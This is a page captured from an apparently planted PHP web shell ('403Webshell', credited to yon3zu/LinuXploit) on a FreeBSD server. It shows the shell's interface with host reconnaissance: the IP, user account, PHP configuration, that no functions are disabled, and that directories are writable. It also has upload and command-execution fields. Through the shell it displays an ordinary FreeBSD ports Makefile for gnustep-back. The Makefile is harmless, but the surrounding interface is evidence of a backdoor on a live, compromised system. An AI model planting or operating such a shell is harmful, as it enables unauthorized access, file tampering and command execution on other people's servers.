403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/x11-toolkits/gnustep-back/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/x11-toolkits/gnustep-back/Makefile
PORTNAME=	gnustep-back
DISTVERSIONPREFIX=	back-
DISTVERSION=	0_28_0
PORTREVISION=	1
CATEGORIES=	x11-toolkits gnustep

MAINTAINER=	ports@FreeBSD.org
COMMENT=	GNUstep GUI backend
WWW=		http://www.gnustep.org/

LICENSE_COMB=	multi
LICENSE=	GPLv3 LGPL3

LIB_DEPENDS+=	libgif.so:graphics/giflib \
		libtiff.so:graphics/tiff \
		libXft.so:x11-fonts/libXft \
		libfontconfig.so:x11-fonts/fontconfig \
		libfreetype.so:print/freetype2 \
		libcairo.so:graphics/cairo

USES=		gl gnustep jpeg pkgconfig xorg
USE_GNUSTEP=	base gui build
USE_XORG=	xft xrender xmu xext x11 xcursor xfixes xmu
USE_GL=	gl
USE_LDCONFIG=	${GNUSTEP_SYSTEM_LIBRARIES}

USE_GITHUB=	yes
GH_ACCOUNT=	gnustep
GH_PROJECT=	libs-back

GNU_CONFIGURE=	yes
CONFIGURE_ARGS=	--with-tiff-library=${LOCALBASE}/lib \
		--with-tiff-include=${LOCALBASE}/include \
		--with-jpeg-library=${LOCALBASE}/lib \
		--with-jpeg-include=${LOCALBASE}/include \
		--with-gif-library=${LOCALBASE}/lib \
		--with-gif-include=${LOCALBASE}/include \
		--enable-graphics=cairo \
		--disable-glitz

# LLD 7 creates a library that does not work with FreeBSD (or OpenBSD) rtld -
# it loads apparently without errors, but the global constructors are not
# called.  It also appears to corrupt some internal state, as throwing an
# exception causes a crash inside rtld.
LLD_UNSAFE=	yes

MAKE_FLAGS+=	OPTFLAG="${CFLAGS} -I${LOCALBASE}/include"
BACKVERSION=	${PORTVERSION:C/([0-9])*[.]([0-9]*).*/\1\2/1}

CFLAGS+=	-I${LOCALBASE}/include/freetype2
PLIST_SUB+=	BACK=back-${BACKVERSION}
PLIST_SUB+=	BACKVERSION=${PORTVERSION:C/([0-9])*[.]([0-9]*).*/\1\2/1}

pre-configure:
.for file in config.guess config.sub install-sh
	@${CP} ${GNUSTEP_PREFIX}/System/Library/Makefiles/${file} ${WRKSRC}
.endfor

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit